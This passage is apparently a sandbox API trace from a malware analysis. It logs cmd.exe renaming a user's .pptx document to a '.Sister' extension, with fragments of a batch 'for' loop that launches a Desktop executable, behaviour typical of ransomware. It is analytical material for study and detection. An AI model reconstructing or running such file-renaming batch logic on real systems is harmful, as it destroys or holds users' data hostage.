ftLastAccessTime.dwLowDateTime=0xdffb6e1c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdffb6e1c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xd, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cac0 [0304.347] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0304.347] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886b0360, ftCreationTime.dwHighDateTime=0x1d5e014, ftLastAccessTime.dwLowDateTime=0xe54857a0, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0xe54857a0, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x4, dwReserved1=0xd, cFileName="epjQhKzUeRgVOT.pptx", cAlternateFileName="EPJQHK~1.PPT")) returned 0x21ed8c7cac0 [0304.348] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0304.348] _wcsnicmp (_String1="EPJQHK~1.PPT", _String2="epjQhKzUeRgVOT.pptx", _MaxCount=0x13) returned 4 [0304.348] malloc (_Size=0x1ff9c) returned 0x21eda17ff00 [0304.349] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.350] GetProcessHeap () returned 0x21ed8c70000 [0304.350] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8ad0 [0304.350] ??_V@YAXPEAX@Z () returned 0x1 [0304.350] ??_V@YAXPEAX@Z () returned 0x1 [0304.350] GetProcessHeap () returned 0x21ed8c70000 [0304.350] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d576a0, Size=0x1a8) returned 0x21ed8d576a0 [0304.350] GetProcessHeap () returned 0x21ed8c70000 [0304.350] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d576a0) returned 0x1a8 [0304.350] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.350] GetFileType (hFile=0x50) returned 0x2 [0304.350] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.350] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.352] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.357] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.357] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.357] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.357] GetFileType (hFile=0x50) returned 0x2 [0304.357] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.357] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.359] GetFileType (hFile=0x50) returned 0x2 [0304.359] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.359] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.360] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d571d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d571d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.360] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"epjQhKzUeRgVOT.pptx\" \"epjQhKzUeRgVOT.pptx.Sister\" ") returned 52 [0304.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.360] GetFileType (hFile=0x50) returned 0x2 [0304.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.360] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.362] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0304.363] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.363] GetFileType (hFile=0x50) returned 0x2 [0304.363] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.363] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.364] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.364] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.364] GetFileType (hFile=0x50) returned 0x2 [0304.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.364] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.365] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.365] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.365] GetFileType (hFile=0x50) returned 0x2 [0304.365] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.365] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.366] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.366] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.366] GetFileType (hFile=0x50) returned 0x2 [0304.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.367] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.367] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.374] GetFileType (hFile=0x50) returned 0x2 [0304.374] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.374] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.374] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d57670*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d57670*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.375] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"epjQhKzUeRgVOT.pptx.Sister\" \"epjQhKzUeRgVOT.bat\" ") returned 51 [0304.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.375] GetFileType (hFile=0x50) returned 0x2 [0304.375] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.375] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.375] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x33) returned 1 [0304.376] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.376] GetFileType (hFile=0x50) returned 0x2 [0304.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.376] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.377] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.381] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.382] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.382] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.382] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.382] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.382] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.382] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.382] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.382] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.382] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.382] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.382] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.382] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.382] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.382] ??_V@YAXPEAX@Z () returned 0x1 [0304.382] GetProcessHeap () returned 0x21ed8c70000 [0304.382] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8c95d30 [0304.383] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95d30, Size=0x78) returned 0x21ed8c95d30 [0304.385] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95d30) returned 0x78 [0304.385] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379660 [0304.385] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8c95dc0 [0304.385] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95dc0, Size=0x78) returned 0x21ed8c95dc0 [0304.385] GetProcessHeap () returned 0x21ed8c70000 [0304.385] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95dc0) returned 0x78 [0304.385] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.386] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.386] GetProcessHeap () returned 0x21ed8c70000 [0304.386] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cac0 [0304.386] GetProcessHeap () returned 0x21ed8c70000 [0304.386] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937cab0 [0304.386] _wcsicmp (_String1="epjQhKzUeRgVOT.pptx", _String2=".") returned 55 [0304.386] _wcsicmp (_String1="epjQhKzUeRgVOT.pptx", _String2="..") returned 55 [0304.386] GetFileAttributesW (lpFileName="epjQhKzUeRgVOT.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\epjqhkzuergvot.pptx")) returned 0x20 [0304.386] GetProcessHeap () returned 0x21ed8c70000 [0304.386] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cf96b0 [0304.387] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cf96c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.388] SetErrorMode (uMode=0x0) returned 0x0 [0304.388] SetErrorMode (uMode=0x1) returned 0x0 [0304.388] GetFullPathNameW (in: lpFileName="epjQhKzUeRgVOT.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda17ff00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx", lpFilePart=0xa6cf4fd660*="epjQhKzUeRgVOT.pptx") returned 0x2d [0304.388] SetErrorMode (uMode=0x0) returned 0x1 [0304.388] GetProcessHeap () returned 0x21ed8c70000 [0304.388] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937cf90 [0304.388] _wcsicmp (_String1="epjQhKzUeRgVOT.pptx", _String2=".") returned 55 [0304.388] _wcsicmp (_String1="epjQhKzUeRgVOT.pptx", _String2="..") returned 55 [0304.388] GetFileAttributesW (lpFileName="epjQhKzUeRgVOT.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\epjqhkzuergvot.pptx")) returned 0x20 [0304.388] ??_V@YAXPEAX@Z () returned 0x1 [0304.388] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.388] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.389] malloc (_Size=0xffce) returned 0x21eda18fee0 [0304.389] ??_V@YAXPEAX@Z () returned 0x21eda18fee0 [0304.389] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\epjqhkzuergvot.pptx")) returned 0x20 [0304.389] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.389] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.389] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed937cac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed937cac0) returned 0x21ed8c7cb20 [0304.390] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.390] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.390] ??_V@YAXPEAX@Z () returned 0x1 [0304.390] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\epjqhkzuergvot.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\epjQhKzUeRgVOT.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\epjqhkzuergvot.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.391] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0x21ed937cac0 | out: lpFindFileData=0x21ed937cac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886b0360, ftCreationTime.dwHighDateTime=0x1d5e014, ftLastAccessTime.dwLowDateTime=0xe54857a0, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0xe54857a0, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x0, dwReserved1=0x0, cFileName="epjQhKzUeRgVOT.pptx", cAlternateFileName="")) returned 0 [0304.392] GetLastError () returned 0x12 [0304.392] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0304.392] ??_V@YAXPEAX@Z () returned 0x1 [0304.392] ??_V@YAXPEAX@Z () returned 0x1 [0304.392] ??_V@YAXPEAX@Z () returned 0x1 [0304.392] ??_V@YAXPEAX@Z () returned 0x1 [0304.392] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cc40 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95be0, Size=0x16) returned 0x21ed8c95820 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95820) returned 0x16 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45c50, Size=0x20) returned 0x21ed8d45b30 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d617c0 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d617c0, Size=0xb2) returned 0x21ed93b4bf0 [0304.393] GetProcessHeap () returned 0x21ed8c70000 [0304.393] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b4bf0) returned 0xb2 [0304.394] GetProcessHeap () returned 0x21ed8c70000 [0304.394] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57860 [0304.394] GetProcessHeap () returned 0x21ed8c70000 [0304.394] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57860, Size=0x30) returned 0x21ed8d57860 [0304.394] GetProcessHeap () returned 0x21ed8c70000 [0304.394] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57860) returned 0x30 [0304.394] GetProcessHeap () returned 0x21ed8c70000 [0304.394] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d578a0 [0304.394] malloc (_Size=0x1ff9c) returned 0x21eda17ff00 [0304.394] GetProcessHeap () returned 0x21ed8c70000 [0304.394] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5bb0 [0304.395] GetProcessHeap () returned 0x21ed8c70000 [0304.395] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b51f0 [0304.395] ??_V@YAXPEAX@Z () returned 0x1 [0304.395] malloc (_Size=0x1ff9c) returned 0x21eda17ff00 [0304.395] GetProcessHeap () returned 0x21ed8c70000 [0304.395] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5970 [0304.395] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda17ff00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.395] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e10, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb20 [0304.395] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0304.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e10, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb20 [0304.395] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0304.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e10, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb20 [0304.396] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0304.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e10, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.396] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.396] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.396] GetProcessHeap () returned 0x21ed8c70000 [0304.396] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d679b0 [0304.396] ??_V@YAXPEAX@Z () returned 0x1 [0304.396] ??_V@YAXPEAX@Z () returned 0x1 [0304.396] GetProcessHeap () returned 0x21ed8c70000 [0304.396] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d578a0, Size=0x490) returned 0x21ed8d578a0 [0304.396] GetProcessHeap () returned 0x21ed8c70000 [0304.397] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d578a0) returned 0x490 [0304.397] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.397] GetFileType (hFile=0x50) returned 0x2 [0304.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.397] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.399] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.406] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.406] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.407] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.407] GetFileType (hFile=0x50) returned 0x2 [0304.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.407] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.407] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, 